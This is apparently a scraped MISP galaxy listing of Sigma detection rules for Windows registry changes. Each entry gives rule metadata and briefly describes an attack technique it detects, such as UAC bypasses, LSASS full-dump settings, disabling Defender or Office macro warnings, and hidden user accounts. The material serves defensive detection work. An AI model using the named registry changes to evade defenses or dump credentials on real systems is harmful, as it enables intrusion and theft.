UUID f674e36a-4b91-431e-8aef-f8a96c2aca35 which can be used as unique global reference for CurrentControlSet Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_currentcontrolset.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Potential EventLog File Location Tampering

Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting

Internal MISP references

UUID 0cb8d736-995d-4ce7-a31e-1e8d452a1459 which can be used as unique global reference for Potential EventLog File Location Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author D3F7A5105
creation_date 2023/01/02
falsepositive ['Unknown']
filename registry_set_evtx_file_key_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

Add Debugger Entry To AeDebug For Persistence

Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes

Internal MISP references

UUID 092af964-4233-4373-b4ba-d86ea2890288 which can be used as unique global reference for Add Debugger Entry To AeDebug For Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Legitimate use of the key to setup a debugger. Which is often the case on developers machines']
filename registry_set_aedebug_persistence.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Suspicious Application Allowed Through Exploit Guard

Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings

Internal MISP references

UUID 42205c73-75c8-4a63-9db1-e3782e06fda0 which can be used as unique global reference for Suspicious Application Allowed Through Exploit Guard in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/05
falsepositive ['Unlikely']
filename registry_set_exploit_guard_susp_allowed_apps.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

System Scripts Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1 which can be used as unique global reference for System Scripts Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_system_scripts.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

RestrictedAdminMode Registry Value Tampering

Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise

Internal MISP references

UUID d6ce7ebd-260b-4323-9768-a9631c8d4db2 which can be used as unique global reference for RestrictedAdminMode Registry Value Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/13
falsepositive ['Unknown']
filename registry_set_lsa_disablerestrictedadmin.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Potential Persistence Via AppCompat RegisterAppRestart Layer

Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. This can be potentially abused as a persistence mechanism.

Internal MISP references

UUID b86852fb-4c77-48f9-8519-eb1b2c308b59 which can be used as unique global reference for Potential Persistence Via AppCompat RegisterAppRestart Layer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024/01/01
falsepositive ['Legitimate applications making use of this feature for compatibility reasons']
filename registry_set_persistence_app_cpmpat_layer_registerapprestart.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.011']
Related clusters

To see the related clusters, click here.

Lsass Full Dump Request Via DumpType Registry Settings

Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.

Internal MISP references

UUID 33efc23c-6ea2-4503-8cfe-bdf82ce8f719 which can be used as unique global reference for Lsass Full Dump Request Via DumpType Registry Settings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @pbssubhash
creation_date 2022/12/08
falsepositive ['Legitimate application that needs to do a full dump of their process']
filename registry_set_lsass_usermode_dumping.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

DHCP Callout DLL Installation

Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)

Internal MISP references

UUID 9d3436ef-9476-4c43-acca-90ce06bdf33a which can be used as unique global reference for DHCP Callout DLL Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Dimitrios Slamaris
creation_date 2017/05/15
falsepositive ['Unknown']
filename registry_set_dhcp_calloutdll.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Microsoft Office Protected View Disabled

Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.

Internal MISP references

UUID a5c7a43f-6009-4a8c-80c5-32abf1c53ecc which can be used as unique global reference for Microsoft Office Protected View Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/06/08
falsepositive ['Unlikely']
filename registry_set_office_disable_protected_view_features.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Desktop Background Change Via Registry

Detects regsitry value settings that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.

Internal MISP references

UUID 85b88e05-dadc-430b-8a9e-53ff1cd30aae which can be used as unique global reference for Potentially Suspicious Desktop Background Change Via Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ)
creation_date 2023/12/21
falsepositive ['Administrative scripts that change the desktop background to a company logo or other image.']
filename registry_set_desktop_background_change.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.impact', 'attack.t1112', 'attack.t1491.001']
Related clusters

To see the related clusters, click here.

Hiding User Account Via SpecialAccounts Registry Key

Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.

Internal MISP references

UUID f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd which can be used as unique global reference for Hiding User Account Via SpecialAccounts Registry Key in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2022/07/12
falsepositive ['Unknown']
filename registry_set_special_accounts.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.002']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Shim Database Modification

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time

Internal MISP references

UUID dfb5b4e8-91d0-4291-b40a-e3b0d3942c45 which can be used as unique global reference for Potential Persistence Via Shim Database Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/30
falsepositive ['Legitimate custom SHIM installations will also trigger this rule']
filename registry_set_persistence_shim_database.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.011']
Related clusters

To see the related clusters, click here.

Bypass UAC Using DelegateExecute

Bypasses User Account Control using a fileless method

Internal MISP references

UUID 46dd5308-4572-4d12-aa43-8938f0184d4f which can be used as unique global reference for Bypass UAC Using DelegateExecute in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/05
falsepositive ['Unknown']
filename registry_set_bypass_uac_using_delegateexecute.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Modification of IE Registry Settings

Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence

Internal MISP references

UUID d88d0ab2-e696-4d40-a2ed-9790064e66b3 which can be used as unique global reference for Modification of IE Registry Settings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/22
falsepositive ['Unknown']
filename registry_set_persistence_ie.yml
level low
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

PowerShell as a Service in Registry

Detects that a powershell code is written to the registry as a service.

Internal MISP references

UUID 4a5f5a5e-ac01-474b-9b4e-d61298c9df1d which can be used as unique global reference for PowerShell as a Service in Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Natalia Shornikova
creation_date 2020/10/06
falsepositive ['Unknown']
filename registry_set_powershell_as_service.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Enabling COR Profiler Environment Variables

Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.

Internal MISP references

UUID ad89044a-8f49-4673-9a55-cbd88a1b374f which can be used as unique global reference for Enabling COR Profiler Environment Variables in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops)
creation_date 2020/09/10
falsepositive No established falsepositives
filename registry_set_enabling_cor_profiler_env_variables.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1574.012']
Related clusters

To see the related clusters, click here.

Suspicious Printer Driver Empty Manufacturer

Detects a suspicious printer driver installation with an empty Manufacturer value

Internal MISP references

UUID e0813366-0407-449a-9869-a2db1119dc41 which can be used as unique global reference for Suspicious Printer Driver Empty Manufacturer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/07/01
falsepositive ['Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value']
filename registry_set_susp_printer_driver.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1574', 'cve.2021.1675']
Related clusters

To see the related clusters, click here.

New TimeProviders Registered With Uncommon DLL Name

Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.

Internal MISP references

UUID e88a6ddc-74f7-463b-9b26-f69fc0d2ce85 which can be used as unique global reference for New TimeProviders Registered With Uncommon DLL Name in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/06/19
falsepositive ['Unknown']
filename registry_set_timeproviders_dllname.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1547.003']
Related clusters

To see the related clusters, click here.

Uncommon Extension In Keyboard Layout IME File Registry Value

Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.

Internal MISP references

UUID b888e3f2-224d-4435-b00b-9dd66e9ea1f1 which can be used as unique global reference for Uncommon Extension In Keyboard Layout IME File Registry Value in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/11/21
falsepositive ['IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.']
filename registry_set_ime_non_default_extension.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Suspicious Environment Variable Has Been Registered

Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings

Internal MISP references

UUID 966315ef-c5e1-4767-ba25-fce9c8de3660 which can be used as unique global reference for Suspicious Environment Variable Has Been Registered in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/20
falsepositive ['Unknown']
filename registry_set_suspicious_env_variables.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence']

Change User Account Associated with the FAX Service

Detect change of the user account associated with the FAX service to avoid the escalation problem.

Internal MISP references

UUID e3fdf743-f05b-4051-990a-b66919be1743 which can be used as unique global reference for Change User Account Associated with the FAX Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/07/17
falsepositive ['Unknown']
filename registry_set_fax_change_service_user.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Disable Administrative Share Creation at Startup

Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system

Internal MISP references

UUID c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e which can be used as unique global reference for Disable Administrative Share Creation at Startup in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/16
falsepositive ['Unknown']
filename registry_set_disable_administrative_share.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.005']
Related clusters

To see the related clusters, click here.

Suspicious Shim Database Patching Activity

Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.

Internal MISP references

UUID bf344fea-d947-4ef4-9192-34d008315d3a which can be used as unique global reference for Suspicious Shim Database Patching Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/01
falsepositive ['Unknown']
filename registry_set_persistence_shim_database_susp_application.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.011']
Related clusters

To see the related clusters, click here.

Outlook Security Settings Updated - Registry

Detects changes to the registry values related to outlook security settings

Internal MISP references

UUID c3cefdf4-6703-4e1c-bad8-bf422fc5015a which can be used as unique global reference for Outlook Security Settings Updated - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/28
falsepositive ['Administrative activity']
filename registry_set_office_outlook_security_settings.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1137']
Related clusters

To see the related clusters, click here.

New Netsh Helper DLL Registered From A Suspicious Location

Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper

Internal MISP references

UUID e7b18879-676e-4a0e-ae18-27039185a8e7 which can be used as unique global reference for New Netsh Helper DLL Registered From A Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/11/28
falsepositive ['Unknown']
filename registry_set_netsh_help_dll_persistence_susp_location.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.007']
Related clusters

To see the related clusters, click here.

Disable Exploit Guard Network Protection on Windows Defender

Detects disabling Windows Defender Exploit Guard Network Protection

Internal MISP references

UUID bf9e1387-b040-4393-9851-1598f8ecfae9 which can be used as unique global reference for Disable Exploit Guard Network Protection on Windows Defender in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/04
falsepositive ['Unknown']
filename registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Office Macros Warning Disabled

Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned.

Internal MISP references

UUID 91239011-fe3c-4b54-9f24-15c86bb65913 which can be used as unique global reference for Office Macros Warning Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/05/22
falsepositive ['Unlikely']
filename registry_set_office_vba_warnings_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Potential Persistence Via LSA Extensions

Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass. The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.

Internal MISP references

UUID 41f6531d-af6e-4c6e-918f-b946f2b85a36 which can be used as unique global reference for Potential Persistence Via LSA Extensions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Unlikely']
filename registry_set_persistence_lsa_extension.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Bypass UAC Using Event Viewer

Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification

Internal MISP references

UUID 674202d0-b22a-4af4-ae5f-2eda1f3da1af which can be used as unique global reference for Bypass UAC Using Event Viewer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/05
falsepositive ['Unknown']
filename registry_set_bypass_uac_using_eventviewer.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.010']
Related clusters

To see the related clusters, click here.

Enable Microsoft Dynamic Data Exchange

Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.

Internal MISP references

UUID 63647769-326d-4dde-a419-b925cc0caf42 which can be used as unique global reference for Enable Microsoft Dynamic Data Exchange in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/26
falsepositive ['Unknown']
filename registry_set_office_enable_dde.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.execution', 'attack.t1559.002']
Related clusters

To see the related clusters, click here.

New Application in AppCompat

A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.

Internal MISP references

UUID 60936b49-fca0-4f32-993d-7415edcf9a5d which can be used as unique global reference for New Application in AppCompat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['This rule is to explore new applications on an endpoint. False positives depends on the organization.', 'Newly setup system.', 'Legitimate installation of new application.']
filename registry_set_new_application_appcompat.yml
level informational
logsource.category registry_set
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']
Related clusters

To see the related clusters, click here.

Windows Defender Service Disabled - Registry

Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry

Internal MISP references

UUID e1aa95de-610a-427d-b9e7-9b46cfafbe6a which can be used as unique global reference for Windows Defender Service Disabled - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali
creation_date 2022/08/01
falsepositive ['Administrator actions']
filename registry_set_disable_windows_defender_service.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

ScreenSaver Registry Key Set

Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl

Internal MISP references

UUID 40b6e656-4e11-4c0c-8772-c1cc6dae34ce which can be used as unique global reference for ScreenSaver Registry Key Set in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)
creation_date 2022/05/04
falsepositive ['Legitimate use of screen saver']
filename registry_set_scr_file_executed_by_rundll32.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Hypervisor Enforced Code Integrity Disabled

Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel

Internal MISP references

UUID 8b7273a4-ba5d-4d8a-b04f-11f2900d043a which can be used as unique global reference for Hypervisor Enforced Code Integrity Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Anish Bogati
creation_date 2023/03/14
falsepositive ['Unknown']
filename registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Outlook Today Pages

Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key "UserDefinedUrl".

Internal MISP references

UUID 487bb375-12ef-41f6-baae-c6a1572b4dd1 which can be used as unique global reference for Potential Persistence Via Outlook Today Pages in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tobias Michalski (Nextron Systems)
creation_date 2021/06/10
falsepositive ['Unknown']
filename registry_set_persistence_outlook_todaypage.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Potential Persistence Via AutodialDLL

Detects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library

Internal MISP references

UUID e6fe26ee-d063-4f5b-b007-39e90aaf50e3 which can be used as unique global reference for Potential Persistence Via AutodialDLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/10
falsepositive ['Unlikely']
filename registry_set_persistence_autodial_dll.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Modify User Shell Folders Startup Value

Detect modification of the startup key to a path where a payload could be stored to be launched during startup

Internal MISP references

UUID 9c226817-8dc9-46c2-a58d-66655aafd7dc which can be used as unique global reference for Modify User Shell Folders Startup Value in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/10/01
falsepositive ['Unknown']
filename registry_set_susp_user_shell_folders.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Sysmon Driver Altitude Change

Detects changes in Sysmon driver altitude value. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.

Internal MISP references

UUID 4916a35e-bfc4-47d0-8e25-a003d7067061 which can be used as unique global reference for Sysmon Driver Altitude Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author B.Talebi
creation_date 2022/07/28
falsepositive ['Legitimate driver altitude change to hide sysmon']
filename registry_set_change_sysmon_driver_altitude.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

CurrentVersion Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID 20f0ee37-5942-4e45-b7d5-c5b5db9df5cd which can be used as unique global reference for CurrentVersion Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_currentversion.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Displaying Hidden Files Feature Disabled

Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files. This technique is abused by several malware families to hide their files from normal users.

Internal MISP references

UUID 5a5152f1-463f-436b-b2f5-8eceb3964b42 which can be used as unique global reference for Displaying Hidden Files Feature Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/02
falsepositive ['Unknown']
filename registry_set_hide_file.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.001']
Related clusters

To see the related clusters, click here.

Registry Modification to Hidden File Extension

Hides the file extension through modification of the registry

Internal MISP references

UUID 5df86130-4e95-4a54-90f7-26541b40aec2 which can be used as unique global reference for Registry Modification to Hidden File Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/22
falsepositive ['Administrative scripts']
filename registry_set_hidden_extention.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1137']
Related clusters

To see the related clusters, click here.

Bypass UAC Using SilentCleanup Task

Detects the setting of the environement variable "windir" to a non default value. Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.

Internal MISP references

UUID 724ea201-6514-4f38-9739-e5973c34f49a which can be used as unique global reference for Bypass UAC Using SilentCleanup Task in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nextron Systems
creation_date 2022/01/06
falsepositive ['Unknown']
filename registry_set_bypass_uac_using_silentcleanup_task.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

ClickOnce Trust Prompt Tampering

Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.

Internal MISP references

UUID ac9159cc-c364-4304-8f0a-d63fc1a0aabb which can be used as unique global reference for ClickOnce Trust Prompt Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SerkinValery, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/12
falsepositive ['Legitimate internal requirements.']
filename registry_set_clickonce_trust_prompt.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Suspicious Service Installed

Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)

Internal MISP references

UUID f2485272-a156-4773-82d7-1d178bc4905b which can be used as unique global reference for Suspicious Service Installed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author xknow (@xknow_infosec), xorxes (@xor_xes)
creation_date 2019/04/08
falsepositive ["Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it."]
filename registry_set_susp_service_installed.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.t1562.001', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Disable Macro Runtime Scan Scope

Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros

Internal MISP references

UUID ab871450-37dc-4a3a-997f-6662aa8ae0f1 which can be used as unique global reference for Disable Macro Runtime Scan Scope in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/25
falsepositive ['Unknown']
filename registry_set_disable_macroruntimescanscope.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion']

DNS-over-HTTPS Enabled by Registry

Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.

Internal MISP references

UUID 04b45a8a-d11d-49e4-9acc-4a1b524407a5 which can be used as unique global reference for DNS-over-HTTPS Enabled by Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/07/22
falsepositive ['Unlikely']
filename registry_set_dns_over_https_enabled.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1140', 'attack.t1112']
Related clusters
